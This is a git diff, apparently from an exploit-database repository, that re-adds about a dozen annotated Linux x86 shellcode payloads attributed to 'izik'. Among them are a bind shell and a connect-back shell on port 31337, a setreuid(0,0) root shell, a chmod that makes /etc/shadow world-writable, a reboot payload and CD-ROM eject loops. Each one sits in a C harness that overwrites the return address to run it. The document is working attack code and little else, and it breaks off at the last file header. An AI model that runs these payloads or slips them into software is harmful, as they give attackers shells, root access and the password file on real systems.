+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x66" // push $0x66
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x6a\x01" // push $0x1
+ "\x5b" // pop %ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x6a\x02" // push $0x2
+
+ //
+ // <_doint>:
+ //
+
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80" // int $0x80
+
+ "\x5b" // pop %ebx
+ "\x5d" // pop %ebp
+ "\x52" // push %edx
+ "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
+ "\x0f\xcd" // bswap %ebp
+ "\x09\xdd" // or %ebx,%ebp
+ "\x55" // push %ebp
+ "\x6a\x10" // push $0x10
+ "\x51" // push %ecx
+ "\x50" // push %eax
+ "\x89\xe1" // mov %esp,%ecx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\xb3\x04" // mov $0x4,%bl
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\x89\x64\x24\x08" // mov %esp,0x8(%esp)
+ "\x43" // inc %ebx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\x93" // xchg %eax,%ebx
+ "\x59" // pop %ecx
+
+ //
+ // <_dup2loop>:
+ //
+
+ "\xb0\x3f" // mov $0x3f,%al
+ "\xcd\x80" // int $0x80
+ "\x49" // dec %ecx
+ "\x79\xf9" // jns <_dup2loop>
+
+ "\xb0\x0b" // mov $0xb,%al
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\xeb\xbb"; // jmp <_doint>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13388.c b/platforms/lin_x86/shellcode/13388.c
index e438b7248..c39d156f8 100755
--- a/platforms/lin_x86/shellcode/13388.c
+++ b/platforms/lin_x86/shellcode/13388.c
@@ -1,93 +1,93 @@
-/*
- * (linux/x86) bind '/bin/sh' to 31337/tcp + fork() - 98 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x66" // push $0x66
- "\x58" // pop %eax
- "\x99" // cltd
- "\x6a\x01" // push $0x1
- "\x5b" // pop %ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x6a\x02" // push $0x2
-
- //
- // <_doint>:
- //
-
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80" // int $0x80
-
- "\x5b" // pop %ebx
- "\x5d" // pop %ebp
- "\x52" // push %edx
- "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
- "\x0f\xcd" // bswap %ebp
- "\x09\xdd" // or %ebx,%ebp
- "\x55" // push %ebp
- "\x6a\x10" // push $0x10
- "\x51" // push %ecx
- "\x50" // push %eax
- "\x89\xe1" // mov %esp,%ecx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\xb3\x04" // mov $0x4,%bl
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
-
- //
- // <_acceptloop>:
- //
-
- "\x5f" // pop %edi
- "\x50" // push %eax
- "\x50" // push %eax
- "\x57" // push %edi
- "\x89\xe1" // mov %esp,%ecx
- "\x43" // inc %ebx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\x93" // xchg %eax,%ebx
- "\xb0\x02" // mov $0x2,%al
- "\xcd\x80" // int $0x80
- "\x85\xc0" // test %eax,%eax
- "\x75\x1a" // jne <_parent>
- "\x59" // pop %ecx
-
- //
- // <_dup2loop>:
- //
-
- "\xb0\x3f" // mov $0x3f,%al
- "\xcd\x80" // int $0x80
- "\x49" // dec %ecx
- "\x79\xf9" // jns <_dup2loop>
-
- "\xb0\x0b" // mov $0xb,%al
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\xeb\xb2" // jmp <_doint>
-
- //
- // <_parent>:
- //
-
- "\x6a\x06" // push $0x6
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
- "\xb3\x04" // mov $0x4,%bl
- "\xeb\xc9"; // jmp <_acceptloop>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) bind '/bin/sh' to 31337/tcp + fork() - 98 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x66" // push $0x66
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x6a\x01" // push $0x1
+ "\x5b" // pop %ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x6a\x02" // push $0x2
+
+ //
+ // <_doint>:
+ //
+
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80" // int $0x80
+
+ "\x5b" // pop %ebx
+ "\x5d" // pop %ebp
+ "\x52" // push %edx
+ "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
+ "\x0f\xcd" // bswap %ebp
+ "\x09\xdd" // or %ebx,%ebp
+ "\x55" // push %ebp
+ "\x6a\x10" // push $0x10
+ "\x51" // push %ecx
+ "\x50" // push %eax
+ "\x89\xe1" // mov %esp,%ecx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\xb3\x04" // mov $0x4,%bl
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+
+ //
+ // <_acceptloop>:
+ //
+
+ "\x5f" // pop %edi
+ "\x50" // push %eax
+ "\x50" // push %eax
+ "\x57" // push %edi
+ "\x89\xe1" // mov %esp,%ecx
+ "\x43" // inc %ebx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+ "\x93" // xchg %eax,%ebx
+ "\xb0\x02" // mov $0x2,%al
+ "\xcd\x80" // int $0x80
+ "\x85\xc0" // test %eax,%eax
+ "\x75\x1a" // jne <_parent>
+ "\x59" // pop %ecx
+
+ //
+ // <_dup2loop>:
+ //
+
+ "\xb0\x3f" // mov $0x3f,%al
+ "\xcd\x80" // int $0x80
+ "\x49" // dec %ecx
+ "\x79\xf9" // jns <_dup2loop>
+
+ "\xb0\x0b" // mov $0xb,%al
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\xeb\xb2" // jmp <_doint>
+
+ //
+ // <_parent>:
+ //
+
+ "\x6a\x06" // push $0x6
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+ "\xb3\x04" // mov $0x4,%bl
+ "\xeb\xc9"; // jmp <_acceptloop>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13389.c b/platforms/lin_x86/shellcode/13389.c
index e9a269059..ac9399d81 100755
--- a/platforms/lin_x86/shellcode/13389.c
+++ b/platforms/lin_x86/shellcode/13389.c
@@ -1,35 +1,35 @@
-/*
- * (linux/x86) 24/7 open cd-rom loop (follows "/dev/cdrom" symlink) - 39 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x05" // push $0x5
- "\x58" // pop %eax
- "\x31\xc9" // xor %ecx,%ecx
- "\x51" // push %ecx
- "\xb5\x08" // mov $0x8,%ch
- "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
- "\x68\x65\x76\x2f\x63" // push $0x632f7665
- "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
- "\x89\xe3" // mov %esp,%ebx
- "\xcd\x80" // int $0x80
- "\x89\xc3" // mov %eax,%ebx
- "\x66\xb9\x09\x53" // mov $0x5309,%cx
-
- //
- // <_openit>:
- //
-
- "\xb0\x36" // mov $0x36,%al
- "\xcd\x80" // int $0x80
- "\xeb\xfa"; // jmp <_openit>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) 24/7 open cd-rom loop (follows "/dev/cdrom" symlink) - 39 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x05" // push $0x5
+ "\x58" // pop %eax
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x51" // push %ecx
+ "\xb5\x08" // mov $0x8,%ch
+ "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
+ "\x68\x65\x76\x2f\x63" // push $0x632f7665
+ "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80" // int $0x80
+ "\x89\xc3" // mov %eax,%ebx
+ "\x66\xb9\x09\x53" // mov $0x5309,%cx
+
+ //
+ // <_openit>:
+ //
+
+ "\xb0\x36" // mov $0x36,%al
+ "\xcd\x80" // int $0x80
+ "\xeb\xfa"; // jmp <_openit>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13390.c b/platforms/lin_x86/shellcode/13390.c
index af7d516a7..0d48839f6 100755
--- a/platforms/lin_x86/shellcode/13390.c
+++ b/platforms/lin_x86/shellcode/13390.c
@@ -1,31 +1,31 @@
-/*
- * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x05" // push $0x5
- "\x58" // pop %eax
- "\x31\xc9" // xor %ecx,%ecx
- "\x51" // push %ecx
- "\xb5\x08" // mov $0x8,%ch
- "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
- "\x68\x65\x76\x2f\x63" // push $0x632f7665
- "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
- "\x89\xe3" // mov %esp,%ebx
- "\xcd\x80" // int $0x80
- "\x89\xc3" // mov %eax,%ebx
- "\xb0\x36" // mov $0x36,%al
- "\x66\xb9\x09\x53" // mov $0x5309,%cx
- "\xcd\x80" // int $0x80
- "\x40" // inc %eax
- "\xcd\x80"; // int $0x80
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x05" // push $0x5
+ "\x58" // pop %eax
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x51" // push %ecx
+ "\xb5\x08" // mov $0x8,%ch
+ "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
+ "\x68\x65\x76\x2f\x63" // push $0x632f7665
+ "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80" // int $0x80
+ "\x89\xc3" // mov %eax,%ebx
+ "\xb0\x36" // mov $0x36,%al
+ "\x66\xb9\x09\x53" // mov $0x5309,%cx
+ "\xcd\x80" // int $0x80
+ "\x40" // inc %eax
+ "\xcd\x80"; // int $0x80
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13391.c b/platforms/lin_x86/shellcode/13391.c
index ef446c073..7706fd5b9 100755
--- a/platforms/lin_x86/shellcode/13391.c
+++ b/platforms/lin_x86/shellcode/13391.c
@@ -1,43 +1,43 @@
-/*
- * (linux/x86) eject & close cd-rom frenzy loop (follows "/dev/cdrom" symlink) - 45 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x05" // push $0x5
- "\x58" // pop %eax
- "\x31\xc9" // xor %ecx,%ecx
- "\x51" // push %ecx
- "\xb5\x08" // mov $0x8,%ch
- "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
- "\x68\x65\x76\x2f\x63" // push $0x632f7665
- "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
- "\x89\xe3" // mov %esp,%ebx
- "\xcd\x80" // int $0x80
- "\x89\xc3" // mov %eax,%ebx
-
- //
- // <_makeio>:
- //
-
- "\x66\xb9\x09\x53" // mov $0x5309,%cx
-
- //
- // <_frenzy>:
- //
-
- "\xb0\x36" // mov $0x36,%al
- "\xcd\x80" // int $0x80
- "\xf5" // cmc
- "\x72\xf5" // jc <_makeio>
- "\x80\xc1\x10" // add $0x10,%cl
- "\xeb\xf4"; // jmp <_frenzy>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) eject & close cd-rom frenzy loop (follows "/dev/cdrom" symlink) - 45 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x05" // push $0x5
+ "\x58" // pop %eax
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x51" // push %ecx
+ "\xb5\x08" // mov $0x8,%ch
+ "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
+ "\x68\x65\x76\x2f\x63" // push $0x632f7665
+ "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80" // int $0x80
+ "\x89\xc3" // mov %eax,%ebx
+
+ //
+ // <_makeio>:
+ //
+
+ "\x66\xb9\x09\x53" // mov $0x5309,%cx
+
+ //
+ // <_frenzy>:
+ //
+
+ "\xb0\x36" // mov $0x36,%al
+ "\xcd\x80" // int $0x80
+ "\xf5" // cmc
+ "\x72\xf5" // jc <_makeio>
+ "\x80\xc1\x10" // add $0x10,%cl
+ "\xeb\xf4"; // jmp <_frenzy>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13392.c b/platforms/lin_x86/shellcode/13392.c
index 8db28bc1c..9c9b417bd 100755
--- a/platforms/lin_x86/shellcode/13392.c
+++ b/platforms/lin_x86/shellcode/13392.c
@@ -1,27 +1,27 @@
-/*
- * (linux/x86) chmod("/etc/shadow", 0666) + exit() - 32 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x0f" // push $0xf
- "\x58" // pop %eax
- "\x31\xc9" // xor %ecx,%ecx
- "\x51" // push %ecx
- "\x66\xb9\xb6\x01" // mov $0x1b6,%cx
- "\x68\x61\x64\x6f\x77" // push $0x776f6461
- "\x68\x63\x2f\x73\x68" // push $0x68732f63
- "\x68\x2f\x2f\x65\x74" // push $0x74652f2f
- "\x89\xe3" // mov %esp,%ebx
- "\xcd\x80" // int $0x80
- "\x40" // inc %eax
- "\xcd\x80"; // int $0x80
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) chmod("/etc/shadow", 0666) + exit() - 32 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x0f" // push $0xf
+ "\x58" // pop %eax
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x51" // push %ecx
+ "\x66\xb9\xb6\x01" // mov $0x1b6,%cx
+ "\x68\x61\x64\x6f\x77" // push $0x776f6461
+ "\x68\x63\x2f\x73\x68" // push $0x68732f63
+ "\x68\x2f\x2f\x65\x74" // push $0x74652f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80" // int $0x80
+ "\x40" // inc %eax
+ "\xcd\x80"; // int $0x80
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13393.c b/platforms/lin_x86/shellcode/13393.c
index 99409f454..f5ef2db62 100755
--- a/platforms/lin_x86/shellcode/13393.c
+++ b/platforms/lin_x86/shellcode/13393.c
@@ -1,65 +1,65 @@
-/*
- * (linux/x86) connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x66" // push $0x66
- "\x58" // pop %eax
- "\x99" // cltd
- "\x6a\x01" // push $0x1
- "\x5b" // pop %ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x6a\x02" // push $0x2
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80" // int $0x80
- "\x5b" // pop %ebx
- "\x5d" // pop %ebp
- "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi (0xxfeffff80 = ~127.0.0.1)
- "\xf7\xd6" // not %esi
- "\x56" // push %esi
- "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
- "\x0f\xcd" // bswap %ebp
- "\x09\xdd" // or %ebx,%ebp
- "\x55" // push %ebp
- "\x43" // inc %ebx
- "\x6a\x10" // push $0x10
- "\x51" // push %ecx
- "\x50" // push %eax
- "\xb0\x66" // mov $0x66,%al
-
- //
- // <_doint>:
- //
-
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80" // int $0x80
- "\x87\xd9" // xchg %ebx,%ecx
- "\x5b" // pop %ebx
-
- //
- // <_dup2loop>:
- //
-
- "\xb0\x3f" // mov $0x3f,%al
- "\xcd\x80" // int $0x80
- "\x49" // dec %ecx
- "\x79\xf9" // jns <_dup2loop>
- "\xb0\x0b" // mov $0xb,%al
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\xeb\xdf"; // jmp <_doint>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x66" // push $0x66
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x6a\x01" // push $0x1
+ "\x5b" // pop %ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x6a\x02" // push $0x2
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80" // int $0x80
+ "\x5b" // pop %ebx
+ "\x5d" // pop %ebp
+ "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi (0xxfeffff80 = ~127.0.0.1)
+ "\xf7\xd6" // not %esi
+ "\x56" // push %esi
+ "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
+ "\x0f\xcd" // bswap %ebp
+ "\x09\xdd" // or %ebx,%ebp
+ "\x55" // push %ebp
+ "\x43" // inc %ebx
+ "\x6a\x10" // push $0x10
+ "\x51" // push %ecx
+ "\x50" // push %eax
+ "\xb0\x66" // mov $0x66,%al
+
+ //
+ // <_doint>:
+ //
+
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80" // int $0x80
+ "\x87\xd9" // xchg %ebx,%ecx
+ "\x5b" // pop %ebx
+
+ //
+ // <_dup2loop>:
+ //
+
+ "\xb0\x3f" // mov $0x3f,%al
+ "\xcd\x80" // int $0x80
+ "\x49" // dec %ecx
+ "\x79\xf9" // jns <_dup2loop>
+ "\xb0\x0b" // mov $0xb,%al
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\xeb\xdf"; // jmp <_doint>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13395.c b/platforms/lin_x86/shellcode/13395.c
index 1e0082a9f..2f7291c83 100755
--- a/platforms/lin_x86/shellcode/13395.c
+++ b/platforms/lin_x86/shellcode/13395.c
@@ -1,45 +1,45 @@ -/* - * (linux/x86) getppid() + execve("/proc//exe", ["/proc//exe", NULL]) - 51 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x40" // push $0x40 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - - // - // <_convert>: - // - - "\x4c" // dec %esp - "\x99" // cltd - "\x6a\x0a" // push $0xa - "\x5b" // pop %ebx - "\xf7\xf3" // div %ebx - "\x80\xc2\x30" // add $0x30,%dl - "\x88\x14\x24" // mov %dl,(%esp) - "\x85\xc0" // test %eax,%eax - "\x75\xef" // jnz _convert - "\x99" // cltd - "\x5b" // pop %ebx - "\x52" // push %edx - "\x68\x2f\x65\x78\x65" // push $0x6578652f - "\x53" // push %ebx - "\x68\x72\x6f\x63\x2f" // push $0x2f636f72 - "\x68\x2f\x2f\x2f\x70" // push $0x702f2f2f - "\xb0\x0b" // mov $0xb,%al - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) getppid() + execve("/proc//exe", ["/proc//exe", NULL]) - 51 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x40" // push $0x40 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + + // + // <_convert>: + // + + "\x4c" // dec %esp + "\x99" // cltd + "\x6a\x0a" // push $0xa + "\x5b" // pop %ebx + "\xf7\xf3" // div %ebx + "\x80\xc2\x30" // add $0x30,%dl + "\x88\x14\x24" // mov %dl,(%esp) + "\x85\xc0" // test %eax,%eax + "\x75\xef" // jnz _convert + "\x99" // cltd + "\x5b" // pop %ebx + "\x52" // push %edx + "\x68\x2f\x65\x78\x65" // push $0x6578652f + "\x53" // push %ebx + "\x68\x72\x6f\x63\x2f" // push $0x2f636f72 + "\x68\x2f\x2f\x2f\x70" // push $0x702f2f2f + "\xb0\x0b" // mov $0xb,%al + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file 
diff --git a/platforms/lin_x86/shellcode/13396.c b/platforms/lin_x86/shellcode/13396.c index 246dfaff9..468d66175 100755 --- a/platforms/lin_x86/shellcode/13396.c +++ b/platforms/lin_x86/shellcode/13396.c @@ -1,17 +1,17 @@ -/* - * (linux/x86) quick (yet conditional, eax != 0 and edx == 0) exit - 4 bytes - * - izik - */ - -char shellcode[] = - - "\xf7\xf0" // div %eax - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) quick (yet conditional, eax != 0 and edx == 0) exit - 4 bytes + * - izik + */ + +char shellcode[] = + + "\xf7\xf0" // div %eax + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13397.c b/platforms/lin_x86/shellcode/13397.c index ee43f4908..5a15e8b71 100755 --- a/platforms/lin_x86/shellcode/13397.c +++ b/platforms/lin_x86/shellcode/13397.c 
@@ -1,21 +1,21 @@ -/* - * (linux/x86) reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART) - 20 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x58" // push $0x58 - "\x58" // pop %eax - "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx - "\xb9\x69\x19\x12\x28" // mov $0x28121969,%ecx - "\xba\x67\x45\x23\x01" // mov $0x1234567,%edx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART) - 20 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x58" // push $0x58 + "\x58" // pop %eax + "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx + "\xb9\x69\x19\x12\x28" // mov $0x28121969,%ecx + "\xba\x67\x45\x23\x01" // mov $0x1234567,%edx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13398.c b/platforms/lin_x86/shellcode/13398.c index c451e4822..463602eda 100755 --- a/platforms/lin_x86/shellcode/13398.c +++ b/platforms/lin_x86/shellcode/13398.c 
@@ -1,30 +1,30 @@ -/* - * (linux/x86) setreuid(0, 0) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 31 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x46" // push $0x46 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx,%ebx - "\x31\xc9" // xor %ecx,%ecx - "\xcd\x80" // int $0x80 - "\x99" // cltd - "\xb0\x0b" // mov $0xb,%al - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) setreuid(0, 0) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 31 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x46" // push $0x46 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx,%ebx + "\x31\xc9" // xor %ecx,%ecx + "\xcd\x80" // int $0x80 + "\x99" // cltd + "\xb0\x0b" // mov $0xb,%al + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13399.c b/platforms/lin_x86/shellcode/13399.c index f941d0f19..a91e92fc5 100755 --- a/platforms/lin_x86/shellcode/13399.c +++ b/platforms/lin_x86/shellcode/13399.c 
@@ -1,26 +1,26 @@ -/* - * (linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) / PUSH - 23 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) / PUSH - 23 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13400.c b/platforms/lin_x86/shellcode/13400.c index af8eca2c1..f86ae3301 100755 --- a/platforms/lin_x86/shellcode/13400.c +++ b/platforms/lin_x86/shellcode/13400.c 
